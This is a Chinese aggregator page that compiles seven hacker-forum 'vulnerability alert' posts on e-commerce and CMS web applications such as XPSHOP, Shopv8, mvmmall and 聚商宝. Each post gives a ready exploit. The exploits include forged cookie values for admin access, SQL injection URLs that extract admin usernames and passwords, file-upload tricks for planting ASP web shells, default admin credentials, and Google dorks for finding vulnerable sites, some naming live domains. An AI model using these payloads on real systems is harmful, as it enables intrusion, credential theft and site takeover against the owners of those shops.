欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

XPSHOP商城系统Cookies欺骗漏洞漏洞预警

时间:2023-06-28 08:52:48 其他范文 收藏本文 下载本文

以下是小编为大家准备的XPSHOP商城系统Cookies欺骗漏洞漏洞预警,本文共7篇,欢迎大家前来参阅。

XPSHOP商城系统Cookies欺骗漏洞漏洞预警

篇1:XPSHOP商城系统Cookies欺骗漏洞漏洞预警

文章作者:121711090

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..

这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...

但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:demo1.xpshop.cn/

先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies

之后便看看他的Cookies...

代码:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1  :

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..

之后就成这样了:

当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

好了..现在再看看会员信息:

是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..

demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..

如下图:

成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..

可是我一直没弄成..理论是只有这样才行..看..

先插马..再备份..但这里出错了..

还望达人能想出更好的办法..

我想了一晚上了....没辙了....

demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录

好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217

demo1.xpshop.cn/helps/t.txt

添加flash广告处可直接上传马

营销管理 - flash广告添加

篇2:Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

Shopv8 商城系统 v12.07,程序下载:www.mycodes.net/20/1099.htm

漏洞文件:list.asp

127.0.0.1/list.asp?id=338

注入中转爆帐号密码

127.0.0.1:808/jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52%20from%20admin

测试的时候关闭js脚本,不然会跳转的,

Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

转自:www.90sec.org/thread-2883-1-1.html

篇3:mvmmall网店商城系统注入漏洞漏洞预警

mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,

代码如下:

require_once ‘include/common.inc.php’;

require_once ROOTPATH.’header.php’;

if($action!=’search’){

$search_key = ”;

if (isset($ps_search))

{  //省略一堆东西

$tag_ids = array; //在if里

//继续省略

while ($row = $db->fetch_array($result)) {

$tag_ids[] = $row['goods_id'];

} //也是在if里

}

//省略一堆东西

} //结束if里的东西

//商品标签搜索

$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入

$tag_search = implode(‘,’,dhtmlchars($tag_ids));   //dhtmlchars过滤HTML标签不用理会

$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!

//省略无关东西

$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….

$total_count = $db->counter($mvm_goods_table,$search_sql);

用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,

测试EXP:

www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23

BY:www.dj4now.com/

篇4:毕业论文选题系统上传漏洞漏洞预警

漏洞出在fileload目录下的FileUpload.asp文件中,用的是无惧组建上传

看代码

01var fu = new FileUpload(“uploadForm”,“idFile”, { Limit: 3, ExtIn: [“rar”,“doc”,“xls”], RanName: true,

02onIniFile: function(file){ file.value ? file.style.display =“none” : this.Folder.removeChild(file); },

03onEmpty: function(){ alert(“请选择一个文件”); },

04onLimite: function(){ alert(“超过上传限制”); },

05onSame: function(){ alert(“已经有相同文件”); },

06onNotExtIn: function(){ alert(“只允许上传” + this.ExtIn.join(“,”) +“文件”); },

07onFail: function(file){ this.Folder.removeChild(file); },

08onIni: function(){

09//显示文件列表

10var arrRows = [];

11if(this.Files.length){

12var This = this;

13Each(this.Files, function(o){

14var a = document.createElement(“a”); a.innerHTML =“取消”; a.href =“javascript.:void(0);”;

15a.onclick = function(){ oThis.Delete(o); return false; };

16arrRows.push([o.value, a]);

17});

18} else { arrRows.push([“没有添加文件”,“ ”]); }

19AddList(arrRows);

20//设置按钮

21$(“idBtnupload”).disabled = $(“idBtndel”).disabled = this.Files.length <= 0;

22}

23});

24

25$(“idBtnupload”).onclick = function(){

26//显示文件列表

27var arrRows = [];

28Each(fu.Files, function(o){ arrRows.push([o.value,“ ”]); });

29AddList(arrRows);

30

31fu.Folder.style.display =“none”;

32$(“idProcess”).style.display =“”;

33$(“idMsg”).innerHTML =“正在上传文件到服务器,请稍候……

有可能因为网络问题,出现程序长时间无响应,请点击“取消”重新上传文件”;

34

35fu.Form.submit();

36}

37

38//用来添加文件列表的函数

39function AddList(rows){

40//根据数组来添加列表

41var FileList = $(“idFileList”), Fragment = document.createDocumentFragment();

42//用文档碎片保存列表

43Each(rows, function(cells){

44var row = document.createElement(“tr”);

45Each(cells, function(o){

46var cell = document.createElement(“td”);

47if(typeof o ==“string”){ cell.innerHTML = o; }else{ cell.appendChild(o); }

48row.appendChild(cell);

49});

50oFragment.appendChild(row);

51})

52//ie的table不支持innerHTML所以这样清空table

53while(FileList.hasChildNodes()){ FileList.removeChild(FileList.firstChild); }

54FileList.appendChild(oFragment);

55}

56

57

58$(“idLimit”).innerHTML = fu.Limit;

59

60$(“idExt”).innerHTML = fu.ExtIn.join(“,”);

61

62$(“idBtndel”).onclick = function(){ fu.Clear(); }

63

64//在后台通过window.parent来访问主页面的函数

65function Finish(msg){ alert(msg); location.href = location.href; }

66

67

68注意:

69

·请选择【rar,doc,xls】格式的文件,其他格式的文件请打包后再上传,

毕业论文选题系统上传漏洞漏洞预警

70

·文件名尽量详细,以方便下载。

71

·文件不能过大。

72

73

没有将文件重命名,外加本地JS验证。配合IIS6.0解析漏洞 如果是IIS7 的话用火狐

漏洞利用方法:

访问www.xxx.com/fileload/FileUpload.asp  然后将ASP木马改为1.asp;.rar 或者asp;.xsl 也行 上传后的文件存在/fileload/file/下面

网站系统下载地址:down.admin5.com/asp/60831.html

篇5:聚商宝2.0暴库及cookies欺骗缺陷及修复漏洞预警

程序:聚商宝2.0

google关键字:intext:技术支持:奔明科技 聚商宝

前几天遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看……

漏洞:暴库以及后台cookies欺骗

1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台

2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:

dim uid,upwd www.****.com

uid=Replace_Text(Request.Form(“userid”))

upwd=md5(Replace_Text(Request.Form(“password”)),16)

Verifycode=Replace_Text(request.Form(“verifycode”))

if not isnumeric(Verifycode) then

Call Logerr

Call ErroFy()

end if

if Cint(Verifycode)Session(“SafeCode”) then

Call ErroFy()

Sub ErroFy()

response.write“”

response.write“”

response.write“出现错误提示”

response.write“

验证码错误!”

response.write“<< 返回上一页”

response.write“”

response.write“”

Response.End()

End Sub

else

Set rs=server.createobject(“adodb.recordset”)

sqltext=“select * from benming_master where Username='” & uid & “' and [PassWord]='” & upwd & “'”

rs.open sqltext,conn,1,1

If Rs.Eof And Rs.Bof Then

response.write“”

response.write“”

response.write“出现错误提示”

response.write“

登陆名或密码不正确!”

response.write“<< 返回上一页”

response.write“”

response.write“”

else

Response.Cookies(“globalecmaster”)=rs(“username”)

Response.Cookies(“masterflag”)=rs(“flag”)

Response.Cookies(“adminid”)=rs(“id”)

LastLogin=Date()

LastLoginIP=getIP()

sql=“update benming_master set LastLogin='”&LastLogin&“',LastLoginIP='”&LastLoginIP&“' where username='”&uid&“'”

conn.execute(sql)

response.write“”

response.write“”

response.write“登陆成功提示”

response.write“

成功通过网站后台管理员身份认证!

2秒后自动进入后台…”

response.write“进入后台管理”

response.write“”

response.write“”

%>

<%

end if

rs.close

set rs=nothing

end if

利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录,

聚商宝2.0暴库及cookies欺骗缺陷及修复漏洞预警

globalecmaster=admin; masterflag=01%2C%%2C%%2C%%

2C%%2C%%2C%%2C%%2C%%2C%0; adminid=1

篇6:乌邦图企业网站系统 cookies 注入漏洞预警

基于asp+access的企业网站源码,数据库已设有有防下载,网站更安全,要修改网站,自定义你自己要的页面,和美化页面都是你自己完成,网站源码程序完整,后台功能强大。

源码下载:www.aspjzy.com/12746.html

程序完整登陆后台:/admin/login.asp

默认登陆帐号:admin 密码:admin888

语句:(前面加个空格)

and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin

或者是16个字段:

and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

爆不出来自己猜字段,

注入点:www.xueyu.org/shownews.asp?=88

getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp

关键字:

inurl:shownews?asp.id=

篇7:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警

OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:

漏洞文件:checkadmin.asp

<%

if request.cookies(“buyok”)(“admin”)=“” then response.write “

%>

大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。

然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。

index.asp

网店后台管理

此网页使用了框架,但您的浏览器不支持框架,

看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。

继续跟进。代码就不发了免得多,最后发现了一个文件。

漏洞文件:include\buyok_functions.asp

下面贴出部分代码:

set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)

if rscheck.eof and rscheck.bof then

response.write “”

response.end

看到这里大家都懂了吧 呵呵~!

OK附上EXP:

KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;

修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.

后台:localhost/admin/login.asp

作者:风之传说

马克斯CMScookies注入漏洞漏洞预警

青创文章系统简单分析漏洞预警

淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

Apple QuickTime信息泄露漏洞漏洞预警

iShowMusic V1.2 写入shell漏洞漏洞预警

在线支付逻辑漏洞总结漏洞预警

elasticsearch 漏洞利用工具套装漏洞预警

渗透底层路由技术漏洞预警

阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警

一个CGI程序的漏洞挖掘漏洞预警

《XPSHOP商城系统Cookies欺骗漏洞漏洞预警(精选7篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档